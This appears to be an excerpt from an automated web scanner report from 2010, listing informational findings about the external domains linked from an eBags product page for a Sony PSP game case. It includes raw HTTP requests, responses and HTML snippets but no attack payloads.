<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.13. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_202.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fcase-logic%2fsony-psp-game-case%2f120830&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:55:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=495108; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: CFTOKEN=39324650; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:55:59 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_3_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_3_1" target="_blank"
><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="120830_3_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_3" />
</div>
...[SNIP]...
<a href="/brand/case-logic"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_202.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&reg; Game Case Black " height="55" width="55" class="iconImage skuImage" data-ipsid="120830_1_1" data-skuid="1312638"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&reg; Game Case Blue" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_2_1" data-skuid="1312639"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&reg; Game Case Red" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_3_1" data-skuid="1312640"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fcase-logic%2fsony-psp-game-case%2f120830&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">
<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" /></span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=120830&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.14. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_202.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fcase-logic%2fsony-psp-game-case%2f120830&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid= HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_2_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_2_1" target="_blank"
><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="120830_2_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_3" />
</div>
...[SNIP]...
<a href="/brand/case-logic"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_202.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&reg; Game Case Black " height="55" width="55" class="iconImage skuImage" data-ipsid="120830_1_1" data-skuid="1312638"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&reg; Game Case Blue" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_2_1" data-skuid="1312639"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&reg; Game Case Red" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_3_1" data-skuid="1312640"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fcase-logic%2fsony-psp-game-case%2f120830&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
